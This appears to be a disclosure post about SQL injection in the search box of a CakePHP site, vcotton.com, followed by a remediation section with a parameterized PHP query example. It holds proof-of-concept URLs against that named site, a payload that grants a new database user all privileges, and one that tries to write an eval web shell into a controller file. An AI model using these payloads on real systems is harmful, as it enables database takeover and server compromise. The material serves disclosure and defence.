http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like+%28%27%
Applications built on most versions of the CakePHP framework do not filter search input against injection.
The 1=1 condition can be changed at will.
Then you can submit:
% ') And 1 = 1; grant all privileges on *. * to 'zimengqian' @ '%' identified by '123 ';#
You can also submit:
% ') And 1 = (select' <? Php eval ($ _ POST [c])?> 'Into outfile'/data/web_root/abram.intra.vcotton.com/www/current/app/app_controller.php'); # (sadly, you do not have the write permission)
Proof of vulnerability:
http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like+%28%27%
http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D2+and+1+like+%28%27%
Solution:
Apply addslashes at the appropriate place and use str_replace to prefix % and _ with a backslash.
Or modify
Core/libs/controller/components/request_handler.php so that the fix applies to all requests (this bug may already have been fixed in 2.0)
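The fix described above can also be done with a bound parameter plus explicit escaping of the LIKE wildcards. The following is an added example, not code from the original post or from CakePHP; the products table, the function names, the '!' escape character and the in-memory SQLite database are assumptions made for the demonstration.

```php
<?php
// Added example (not CakePHP code). Table, column and function names are hypothetical.

/** Escape LIKE metacharacters so that user input is matched literally. */
function escape_like(string $term, string $esc = '!'): string
{
    // str_replace works through the pairs in order, so the escape character
    // itself is doubled first, then % and _ are prefixed with it.
    return str_replace(
        [$esc, '%', '_'],
        [$esc . $esc, $esc . '%', $esc . '_'],
        $term
    );
}

/** Search by keyword with a bound pattern instead of string concatenation. */
function search_products(PDO $db, string $keywords): array
{
    // Only the code adds the surrounding wildcards; the user's text is data.
    $stmt = $db->prepare(
        "SELECT name FROM products WHERE name LIKE :pat ESCAPE '!'"
    );
    $stmt->execute([':pat' => '%' . escape_like($keywords) . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE products (name TEXT)");
$db->exec("INSERT INTO products VALUES
    ('cotton shirt'), ('100% cotton'), ('a_b'), ('axb')");

// Inputs carrying quote and wildcard characters, passed through as plain text.
$inputs = ["%') and 1=1 and 1 like ('", '100%', 'a_b', 'cotton'];
foreach ($inputs as $kw) {
    echo $kw, ' => ', json_encode(search_products($db, $kw)), PHP_EOL;
}
```

Because the value is bound, the quote and parenthesis in the keywords never reach the SQL parser, and the ESCAPE clause keeps % and _ from acting as wildcards.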
Author: Zi mengyu